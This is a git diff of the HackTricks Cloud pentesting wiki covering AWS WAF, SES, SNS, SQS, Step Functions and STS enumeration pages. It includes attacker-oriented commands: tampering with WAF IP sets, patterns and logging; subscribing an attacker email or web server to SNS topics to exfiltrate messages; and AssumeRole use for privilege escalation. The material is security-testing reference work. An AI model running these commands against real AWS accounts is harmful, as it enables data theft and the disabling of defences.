@@ -403,13 +387,13 @@ aws wafv2 create-ip-set --name --ip-address-version --addr # Update IP set aws wafv2 update-ip-set --name --id --addresses --lock-token --scope | CLOUDFRONT --region=us-east-1> # Delete IP set -aws wafv2 delete-ip-set --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> +aws wafv2 delete-ip-set --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` The following example shows how to **overwrite the existing IP set by the desired IP set**: ```bash -aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1 +aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1 ``` **Potential Impact**: Unauthorized access and block of legitimate traffic. 
@@ -418,13 +402,13 @@ aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns. -* Creating new regex patterns would help an attacker to allow harmful content -* Updating the existing patterns, an attacker would to bypass security rules -* Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures. +- Creating new regex patterns would help an attacker to allow harmful content +- Updating the existing patterns, an attacker would to bypass security rules +- Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures. ```bash # Create regex pattern set -aws wafv2 create-regex-pattern-set --name --regular-expression-list --scope | CLOUDFRONT --region=us-east-1> [--description ] +aws wafv2 create-regex-pattern-set --name --regular-expression-list --scope | CLOUDFRONT --region=us-east-1> [--description ] # Update regex pattern set aws wafv2 update-regex-pattern-set --name --id --regular-expression-list --lock-token --scope | CLOUDFRONT --region=us-east-1> # Delete regex pattern set 
@@ -439,13 +423,12 @@ An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to rem During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination: -* **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group. -* **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket. -* **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream. +- **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group. +- **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket. +- **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream. -{% hint style="info" %} -It is possible to define only one logging destination per web ACL. -{% endhint %} +> [!NOTE] +> It is possible to define only one logging destination per web ACL. ```bash # Put logging configuration 
@@ -462,7 +445,7 @@ An attacker with this permissions would be able to delete existing API keys, ren ```bash # Delete API key -aws wafv2 delete-api-key --api-key --scope | CLOUDFRONT --region=us-east-1> +aws wafv2 delete-api-key --api-key --scope | CLOUDFRONT --region=us-east-1> ``` **Potential Impact**: Disable CAPTCHA protections or disrupt application functionality, leading to security breaches and potential data theft. @@ -482,20 +465,7 @@ aws wafv2 untag-resource --resource-arn --tag-keys ## References -* [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/) -* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html) +- [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/) +- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md similarity index 61% rename from pentesting-cloud/aws-security/aws-services/aws-ses-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md index bc219d0c6..88fb06dd8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md @@ -1,19 +1,6 @@ # AWS - SES Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -51,11 +38,9 @@ It's also possible to do this from the AWS console web. ### Enumeration -{% hint style="warning" %} -Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two. -{% endhint %} +> [!WARNING] +> Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two. -{% code overflow="wrap" %} ```bash # Get info about the SES account aws sesv2 get-account @@ -132,25 +117,11 @@ aws ses get-send-quota ## Get statistics aws ses get-send-statistics ``` -{% endcode %} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-ses-post-exploitation.md" %} -[aws-ses-post-exploitation.md](../aws-post-exploitation/aws-ses-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-ses-post-exploitation.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md new file mode 100644 index 000000000..01467ee06 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md 
@@ -0,0 +1,79 @@
+# AWS - SNS Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## SNS
+
+Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types.
+
+Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern.
+
+### **Difference with SQS**
+
+**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\
+On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\
+While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns.
+
+### **Enumeration**
+
+```bash
+# Get topics & subscriptions
+aws sns list-topics
+aws sns list-subscriptions
+aws sns list-subscriptions-by-topic --topic-arn
+
+# Check privescs & post-exploitation
+aws sns publish --region \
+ --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
+ --message file://message.txt
+
+# Exfiltrate through email
+## You will receive an email to confirm the subscription
+aws sns subscribe --region \
+ --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
+ --protocol email \
+ --notification-endpoint my-email@example.com
+
+# Exfiltrate through web server
+## You will receive an initial request with a URL in the field "SubscribeURL"
+## that you need to access to confirm the subscription
+aws sns subscribe --region \
+ --protocol http \
+ --notification-endpoint http:/// \
+ --topic-arn
+```
+
+> [!CAUTION]
+> Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used).
+>
+> Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region.
+
+#### Unauthenticated Access
+
+{{#ref}}
+../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
+{{#endref}}
+
+#### Privilege Escalation
+
+{{#ref}}
+../aws-privilege-escalation/aws-sns-privesc.md
+{{#endref}}
+
+#### Post Exploitation
+
+{{#ref}}
+../aws-post-exploitation/aws-sns-post-exploitation.md
+{{#endref}}
+
+#### Persistence
+
+{{#ref}}
+../aws-persistence/aws-sns-persistence.md
+{{#endref}}
+
+## References
+
+- [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
new file mode 100644
index 000000000..63770cd06
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
@@ -0,0 +1,53 @@
+# AWS - SQS Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## SQS
+
+Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work.
+
+### Enumeration
+
+```bash
+# Get queues info
+aws sqs list-queues
+aws sqs get-queue-attributes --queue-url --attribute-names All
+
+# More about this in privesc & post-exploitation
+aws sqs receive-message --queue-url
+
+aws sqs send-message --queue-url --message-body
+```
+
+> [!CAUTION]
+> Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region.
+
+#### Unauthenticated Access
+
+{{#ref}}
+../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
+{{#endref}}
+
+#### Privilege Escalation
+
+{{#ref}}
+../aws-privilege-escalation/aws-sqs-privesc.md
+{{#endref}}
+
+#### Post Exploitation
+
+{{#ref}}
+../aws-post-exploitation/aws-sqs-post-exploitation.md
+{{#endref}}
+
+#### Persistence
+
+{{#ref}}
+../aws-persistence/aws-sqs-persistence.md
+{{#endref}}
+
+## References
+
+- https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md similarity index 56% rename from pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md index 1ca042e36..c5c6ed131 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md @@ -1,19 +1,6 @@ # AWS - Step Functions Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Step Functions 
@@ -25,33 +12,33 @@ AWS Step Functions is a workflow service that enables you to coordinate and orch AWS Step Functions offers two types of **state machine workflows**: Standard and Express. -* **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year. -* **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage. +- **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year. +- **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage. ### States States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type: -* **Task:** Executes a job, often using an AWS service like Lambda. -* **Choice:** Makes decisions based on input. -* **Fail/Succeed:** Ends the execution with a failure or success. -* **Pass:** Passes input to output or injects data. -* **Wait:** Delays execution for a set time. -* **Parallel:** Initiates parallel branches. 
-* **Map:** Dynamically iterates steps over items. +- **Task:** Executes a job, often using an AWS service like Lambda. +- **Choice:** Makes decisions based on input. +- **Fail/Succeed:** Ends the execution with a failure or success. +- **Pass:** Passes input to output or injects data. +- **Wait:** Delays execution for a set time. +- **Parallel:** Initiates parallel branches. +- **Map:** Dynamically iterates steps over items. ### Task A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs. -* **Activities**: Custom workers you manage, suitable for long-running processes. - * Resource: **`arn:aws:states:region:account:activity:name`**. -* **Lambda Functions**: Executes AWS Lambda functions. - * Resource: **`arn:aws:lambda:region:account:function:function-name`**. -* **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3. - * Resource: **`arn:partition:states:region:account:servicename:APIname`**. -* **HTTP Task**: Calls third-party APIs. - * Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details. +- **Activities**: Custom workers you manage, suitable for long-running processes. + - Resource: **`arn:aws:states:region:account:activity:name`**. +- **Lambda Functions**: Executes AWS Lambda functions. + - Resource: **`arn:aws:lambda:region:account:function:function-name`**. +- **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3. + - Resource: **`arn:partition:states:region:account:servicename:APIname`**. +- **HTTP Task**: Calls third-party APIs. + - Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details. 
The following example shows a Task state definition that invokes a Lambda function called HelloWorld: @@ -71,8 +58,8 @@ The following example shows a Task state definition that invokes a Lambda functi A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results. -* **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable. -* **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true. +- **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable. +- **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true. Example of **Choice** state: @@ -90,8 +77,9 @@ A **`Fail`** state stops the execution of a state machine and marks it as a fail A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field. -{% tabs %} -{% tab title="Fail example" %} +{{#tabs }} +{{#tab name="Fail example" }} + ```json "FailState": { "Type": "Fail", @@ -99,16 +87,19 @@ A **`Succeed`** state stops the execution successfully. It is typically used to "Cause": "Error details" } ``` -{% endtab %} -{% tab title="Succeed example" %} +{{#endtab }} + +{{#tab name="Succeed example" }} + ```json "SuccessState": { "Type": "Succeed" } ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### Pass 
@@ -127,42 +118,44 @@ A **Pass** state passes its input to its output either without performing any wo A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time: -* **X Seconds**: A fixed number of seconds to wait. +- **X Seconds**: A fixed number of seconds to wait. - ```json - "WaitState": { - "Type": "Wait", - "Seconds": 10, - "Next": "NextState" - } - ``` -* **Absolute Timestamp**: An exact time to wait until. + ```json + "WaitState": { + "Type": "Wait", + "Seconds": 10, + "Next": "NextState" + } + ``` - ```json - "WaitState": { - "Type": "Wait", - "Timestamp": "2024-03-14T01:59:00Z", - "Next": "NextState" - } - ``` -* **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**. +- **Absolute Timestamp**: An exact time to wait until. - ```json - jsonCopiar código - "WaitState": { - "Type": "Wait", - "TimestampPath": "$.expirydate", - "Next": "NextState" - } - ``` + ```json + "WaitState": { + "Type": "Wait", + "Timestamp": "2024-03-14T01:59:00Z", + "Next": "NextState" + } + ``` + +- **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**. + + ```json + jsonCopiar código + "WaitState": { + "Type": "Wait", + "TimestampPath": "$.expirydate", + "Next": "NextState" + } + ``` ### Parallel A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are: -* **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine. -* **ResultPath**: Defines where (in the input) to place the combined output of the branches. -* **Retry and Catch**: Error handling configurations for the parallel state. +- **Branches**: An array defining the parallel execution paths. 
Each branch is a separate state machine. +- **ResultPath**: Defines where (in the input) to place the combined output of the branches. +- **Retry and Catch**: Error handling configurations for the parallel state. ```json "ParallelState": { 
@@ -185,77 +178,78 @@ A **Parallel** state allows you to execute multiple branches of tasks concurrent A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes: -* **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state. +- **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state. - ```json - "MapState": { - "Type": "Map", - "ItemsPath": "$.arrayItems", - "ItemProcessor": { - "ProcessorConfig": { - "Mode": "INLINE" - }, - "StartAt": "AddState", - "States": { - "AddState": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "OutputPath": "$.Payload", - "Parameters": { - "FunctionName": "arn:aws:lambda:::function:add-function" - }, - "End": true - } - } - }, - "End": true - "ResultPath": "$.detail.added", - "ItemsPath": "$.added" - } - ``` -* **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution. 
- - ```json - "DistributedMapState": { - "Type": "Map", - "ItemReader": { - "Resource": "arn:aws:states:::s3:getObject", - "Parameters": { - "Bucket": "my-bucket", - "Key": "data.csv" - } - }, - "ItemProcessor": { + ```json + "MapState": { + "Type": "Map", + "ItemsPath": "$.arrayItems", + "ItemProcessor": { "ProcessorConfig": { - "Mode": "DISTRIBUTED", - "ExecutionType": "EXPRESS" + "Mode": "INLINE" }, - "StartAt": "ProcessItem", + "StartAt": "AddState", "States": { - "ProcessItem": { - "Type": "Task", - "Resource": "arn:aws:lambda:region:account-id:function:my-function", - "End": true - } + "AddState": { + "Type": "Task", + "Resource": "arn:aws:states:::lambda:invoke", + "OutputPath": "$.Payload", + "Parameters": { + "FunctionName": "arn:aws:lambda:::function:add-function" + }, + "End": true + } } + }, + "End": true + "ResultPath": "$.detail.added", + "ItemsPath": "$.added" + } + ``` + +- **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution. 
+ + ```json + "DistributedMapState": { + "Type": "Map", + "ItemReader": { + "Resource": "arn:aws:states:::s3:getObject", + "Parameters": { + "Bucket": "my-bucket", + "Key": "data.csv" + } + }, + "ItemProcessor": { + "ProcessorConfig": { + "Mode": "DISTRIBUTED", + "ExecutionType": "EXPRESS" }, - "End": true - "ResultWriter": { - "Resource": "arn:aws:states:::s3:putObject", - "Parameters": { - "Bucket": "myOutputBucket", - "Prefix": "csvProcessJobs" - } - } - } - ``` + "StartAt": "ProcessItem", + "States": { + "ProcessItem": { + "Type": "Task", + "Resource": "arn:aws:lambda:region:account-id:function:my-function", + "End": true + } + } + }, + "End": true + "ResultWriter": { + "Resource": "arn:aws:states:::s3:putObject", + "Parameters": { + "Bucket": "myOutputBucket", + "Prefix": "csvProcessJobs" + } + } + } + ``` ### Versions and aliases Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine. -* **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version. -* **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). 
Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management. +- **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version. +- **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management. For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html). 
@@ -263,8 +257,8 @@ For more detailed information about **ASL**, check: [**Amazon States Language**] AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions: -* **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions. -* **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted. +- **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions. +- **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted. ## Enumeration 
@@ -278,14 +272,14 @@ aws stepfunctions list-state-machines ## Retrieve informatio about the specified state machine aws stepfunctions describe-state-machine --state-machine-arn -## List versions for the specified state machine +## List versions for the specified state machine aws stepfunctions list-state-machine-versions --state-machine-arn ## List aliases for the specified state machine aws stepfunctions list-state-machine-aliases --state-machine-arn ## Retrieve information about the specified state machine alias aws stepfunctions describe-state-machine-alias --state-machine-alias-arn -## List executions of a state machine +## List executions of a state machine aws stepfunctions list-executions --state-machine-arn [--status-filter ] [--redrive-filter ] ## Retrieve information and relevant metadata about a state machine execution (output included) aws stepfunctions describe-execution --execution-arn @@ -321,39 +315,26 @@ aws stepfunctions list-executions --map-run-arn [--status-filter [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
new file mode 100644
index 000000000..7e73f30ea
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
@@ -0,0 +1,100 @@
+# AWS - STS Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## STS
+
+**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users).
+
+Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options.
+
+### Assume Role Impersonation
+
+The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN.
+
+For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard.
+
+#### Assume Role Logic
+
+In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in:
+
+```json
+{
+ "Version": "2012-10-17",
+ "Statement": [
+ {
+ "Effect": "Allow",
+ "Principal": {
+ "AWS": "arn:aws:iam:::role/priv-role"
+ },
+ "Action": "sts:AssumeRole",
+ "Condition": {}
+ }
+ ]
+}
+```
+
+The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough).
+
+However, if a role is allowing an account to assume it, like in:
+
+```json
+{
+ "Version": "2012-10-17",
+ "Statement": [
+ {
+ "Effect": "Allow",
